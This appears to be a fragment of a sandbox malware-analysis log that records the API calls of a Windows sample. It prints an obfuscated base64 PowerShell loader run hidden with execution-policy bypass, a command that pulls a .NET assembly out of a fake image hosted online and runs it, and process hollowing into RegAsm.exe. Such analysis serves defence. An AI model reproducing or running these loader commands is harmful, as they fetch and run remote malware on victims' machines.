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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('PzXsYGN','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002f0
1 1 0

NtResumeThread

 thread_handle: 0x00000298
suspend_count: 1
process_identifier: 2628
1 0 0

NtResumeThread

 thread_handle: 0x000002ec
suspend_count: 1
process_identifier: 2628
1 0 0

NtResumeThread

 thread_handle: 0x00000448
suspend_count: 1
process_identifier: 2628
1 0 0

CreateProcessInternalW

 thread_identifier: 2772
thread_handle: 0x0000044c
process_identifier: 2768
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm9hbGloc2FtLzEyMS43Mi40MTIuNTkvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0

NtResumeThread

 thread_handle: 0x00000494
suspend_count: 1
process_identifier: 2628
1 0 0

NtResumeThread

 thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 2768
1 0 0

NtResumeThread

 thread_handle: 0x000002f8
suspend_count: 1
process_identifier: 2768
1 0 0

NtResumeThread

 thread_handle: 0x0000045c
suspend_count: 1
process_identifier: 2768
1 0 0

NtResumeThread

 thread_handle: 0x00000584
suspend_count: 1
process_identifier: 2768
1 0 0

CreateProcessInternalW

 thread_identifier: 3000
thread_handle: 0x0000033c
process_identifier: 2996
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000344
1 1 0

NtGetContextThread

 thread_handle: 0x0000033c
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2996
region_size: 196608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000344
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL!; dà 0†¾¤ @ @…l¤OÀFà  H.textĄ † `.rsrcFÀˆ@@.reloc àŽ@B
base_address: 0x00400000
process_identifier: 2996
process_handle: 0x00000344
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00402000
process_identifier: 2996
process_handle: 0x00000344
1 1 0

WriteProcessMemory

 buffer:  €P€8€€h€ À¼\Ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalName3c9df946-5a0b-48a2-9626-80817a0ac3af.exe(LegalCopyright |)OriginalFilename3c9df946-5a0b-48a2-9626-80817a0ac3af.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0042c000
process_identifier: 2996
process_handle: 0x00000344
1 1 0

WriteProcessMemory

 buffer:   À4
base_address: 0x0042e000
process_identifier: 2996
process_handle: 0x00000344
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2996
process_handle: 0x00000344
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4367550
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000033c
process_identifier: 2996
1 0 0

NtResumeThread

 thread_handle: 0x0000033c
suspend_count: 1
process_identifier: 2996
1 0 0

NtResumeThread

 thread_handle: 0x000003b8
suspend_count: 1
process_identifier: 2768
1 0 0

NtResumeThread

 thread_handle: 0x00000178
suspend_count: 1
process_identifier: 2996
1 0 0

NtResumeThread

 thread_handle: 0x000001f0
suspend_count: 1
process_identifier: 2996
1 0 0

NtResumeThread

 thread_handle: 0x0000022c
suspend_count: 1
process_identifier: 2996
1 0 0

NtResumeThread

 thread_handle: 0x000002d0
suspend_count: 1
process_identifier: 2996
1 0 0

NtResumeThread

 thread_handle: 0x00000340
suspend_count: 1
process_identifier: 2996
1 0 0

NtResumeThread

 thread_handle: 0x000003b4
suspend_count: 1
process_identifier: 2996
1 0 0

NtResumeThread

 thread_handle: 0x000003f0
suspend_count: 1
process_identifier: 2996
1 0 0
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe